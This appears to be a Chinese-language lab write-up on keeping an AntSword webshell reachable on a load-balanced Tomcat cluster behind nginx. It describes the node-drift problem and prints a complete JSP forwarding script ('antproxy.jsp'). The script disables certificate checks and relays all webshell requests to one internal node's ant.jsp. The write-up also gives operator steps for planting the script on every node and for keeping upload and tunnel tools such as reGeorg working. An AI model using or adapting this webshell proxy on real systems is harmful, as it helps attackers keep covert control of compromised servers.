一、首先环境配置
1.上传文件并解压
data:image/s3,"s3://crabby-images/7be44/7be4475633f96cac239bf8edd9be9d075e96902b" alt=""
2.进入目录下
data:image/s3,"s3://crabby-images/206d8/206d8ac02a5fc9bb57a7470d3d10d51d6ce62cb5" alt=""
为了方便解释,我们只用两个节点,启动之后,大家可以看到有 3 个容器(可想像成有 3 台服务器就成)。
data:image/s3,"s3://crabby-images/75b93/75b93e0465e64d422869e9c43c4a8c5c5f3fc9fb" alt=""
二、使用蚁剑去连接
因为两台节点都在相同的位置存在 ant.jsp,所以连接的时候也没出现什么异常。
data:image/s3,"s3://crabby-images/3caaf/3caafdbf85c05b9f7f4ecc3a11998226248c29b4" alt=""
一旦有一台机器上没有ant.jsap,那再次请求的时候,就会出现 404 错误,就是一会正常一会错误,漂移ip的问题
data:image/s3,"s3://crabby-images/bf06a/bf06ad7980096170c617301420f5ff9a25fda2c0" alt=""
三、实际问题
1.1我们访问的时候,不知道在那台机器执行 解决:多上传
1.2文件上传的时候,不知道上传到那台机器,无法知道下次请求谁进行执行的
1.3上传**工具时候,不知道上传到那台机器(分片文件上传不完整)
1.4反向连接,内网所有机器无法访问外网,咱们把飘逸的机器当做服务器部署例如reGeorge/HtAbs这些工具,我们与内部建立的传输隧道当ip飘逸的时候,传输便会中断1
四、解决
1.1关掉一套机器(作死玩法)
1.2写一个shell脚本在执行命令前判断一下是不是此机器,再选择性执行
data:image/s3,"s3://crabby-images/760ef/760efdc6ca9565bfccb583304fc1b105cf2915e0" alt=""
实现效果:
data:image/s3,"s3://crabby-images/332b2/332b2a368a66c1aed7c4cf0e9bdf8f47af425928" alt=""
1.3在Web 层做一次 HTTP 流量转发
虽然我们不能访问,但是NGinx可以,两台服务器也是可以的
图解:
data:image/s3,"s3://crabby-images/d836c/d836cf495a21914f3a5eff7cb066883119b26951" alt=""
总结:不管我怎么访问,我通过转发后的结果是,始终在访问一台机器
1.4我们使用流量转发的代码
<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<%@ page import="javax.net.ssl.*" %>
<%@ page import="java.io.ByteArrayOutputStream" %>
<%@ page import="java.io.DataInputStream" %>
<%@ page import="java.io.InputStream" %>
<%@ page import="java.io.OutputStream" %>
<%@ page import="java.net.HttpURLConnection" %>
<%@ page import="java.net.URL" %>
<%@ page import="java.security.KeyManagementException" %>
<%@ page import="java.security.NoSuchAlgorithmException" %>
<%@ page import="java.security.cert.CertificateException" %>
<%@ page import="java.security.cert.X509Certificate" %>
<%!
public static void ignoreSsl() throws Exception {
HostnameVerifier hv = new HostnameVerifier() {
public boolean verify(String urlHostName, SSLSession session) {
return true;
}
};
trustAllHttpsCertificates();
HttpsURLConnection.setDefaultHostnameVerifier(hv);
}
private static void trustAllHttpsCertificates() throws Exception {
TrustManager[] trustAllCerts = new TrustManager[] { new X509TrustManager() {
public X509Certificate[] getAcceptedIssuers() {
return null;
}
@Override
public void checkClientTrusted(X509Certificate[] arg0, String arg1) throws CertificateException {
// Not implemented
}
@Override
public void checkServerTrusted(X509Certificate[] arg0, String arg1) throws CertificateException {
// Not implemented
}
} };
try {
SSLContext sc = SSLContext.getInstance("TLS");
sc.init(null, trustAllCerts, new java.security.SecureRandom());
HttpsURLConnection.setDefaultSSLSocketFactory(sc.getSocketFactory());
} catch (KeyManagementException e) {
e.printStackTrace();
} catch (NoSuchAlgorithmException e) {
e.printStackTrace();
}
}
%>
<%
String target = "http://172.20.0.2:8080/ant.jsp";
URL url = new URL(target);
if ("https".equalsIgnoreCase(url.getProtocol())) {
ignoreSsl();
}
HttpURLConnection conn = (HttpURLConnection)url.openConnection();
StringBuilder sb = new StringBuilder();
conn.setRequestMethod(request.getMethod());
conn.setConnectTimeout(30000);
conn.setDoOutput(true);
conn.setDoInput(true);
conn.setInstanceFollowRedirects(false);
conn.connect();
ByteArrayOutputStream baos=new ByteArrayOutputStream();
OutputStream out2 = conn.getOutputStream();
DataInputStream in=new DataInputStream(request.getInputStream());
byte[] buf = new byte[1024];
int len = 0;
while ((len = in.read(buf)) != -1) {
baos.write(buf, 0, len);
}
baos.flush();
baos.writeTo(out2);
baos.close();
InputStream inputStream = conn.getInputStream();
OutputStream out3=response.getOutputStream();
int len2 = 0;
while ((len2 = inputStream.read(buf)) != -1) {
out3.write(buf, 0, len2);
}
out3.flush();
out3.close();
%>
1.5具体操作总结
1.5.1我们将 target 指向了 LBSNode1 的 ant.jsp
data:image/s3,"s3://crabby-images/fbe2f/fbe2f5417826080a480506617b27179cebf571e6" alt=""
注意:
a) 不要使用上传功能,上传功能会分片上传,导致分散在不同 Node 上。
b) 要保证每一台 Node 上都有相同路径的 antproxy.jsp, 所以保存了很多次,保证每一台都上传了脚本
1.5.2
修改 Shell 配置, 将 URL 部分填写为 antproxy.jsp 的地址,其它配置不变
data:image/s3,"s3://crabby-images/5821b/5821b8d5faf6fe2bb9b81b2465507b0cf86c30b2" alt=""
1.5.3
测试执行命令, 查看 IP
data:image/s3,"s3://crabby-images/25dc3/25dc32eff4a72d0b2df0bacfaccd7c427207ca55" alt=""
可以看到 IP 已经固定, 意味着请求已经固定到了 LBSNode1 这台机器上了。此时使用分片上传、HTTP 代理,都已经跟单机的情况没什么区别了。
1.5.4
查看一下 Node1 上面的 tomcat 的日志, 可以看到收束的过程:
data:image/s3,"s3://crabby-images/9e1d9/9e1d9650c9a4a6ee89fc1b164311344b6aae2336" alt=""
Node1 和 Node2 交叉着访问 Node1 的 /ant.jsp 文件,符合 nginx 此时的 LBS 策略。
五、整体实验总结
优点:
-
低权限就可以完成,如果权限高的话,还可以通过端口层面直接转发,不过这跟 1.1的关服务就没啥区别了
-
流量上,只影响访问 WebShell 的请求,其它的正常业务请求不会影响。
-
适配更多工具
缺点:
- 该方案需要「目标 Node」和「其它 Node」 之间内网互通,如果不互通就凉了